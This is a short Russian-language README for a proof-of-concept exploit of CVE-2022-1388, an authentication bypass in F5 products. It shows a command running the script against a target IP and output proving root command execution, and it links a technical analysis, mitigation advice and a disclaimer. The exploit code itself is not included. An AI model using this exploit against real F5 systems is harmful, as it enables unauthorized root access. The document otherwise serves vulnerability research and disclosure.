
POC для CVE-2022-1388
POC для CVE-2022-1388, затрагивающий несколько продуктов F5.
Технический анализ первопричин уязвимости можно найти в нашем блоге: https://www.horizon3.ai/f5-icontrol-rest-endpoint-authentication-bypass-technical-deep-dive/
Необходимые условия запроса для эксплуатации этой уязвимости:
root@kali:/home/dev# python3 CVE-2022-1388.py -t 192.168.0.221 -c id
uid=0(root) gid=0(root) groups=0(root) context=system_u:system_r:initrc_t:s0
Обновитесь до последней версии или примите меры защиты, следуя инструкциям в рекомендациях F5 по безопасности
Данное программное обеспечение создано исключительно для академических исследований и разработки эффективных методов защиты и не предназначено для использования в атаках на системы, за исключением случаев явного разрешения. Авторы проекта не несут ответственности за неправомерное использование программного обеспечения. Используйте ответственно.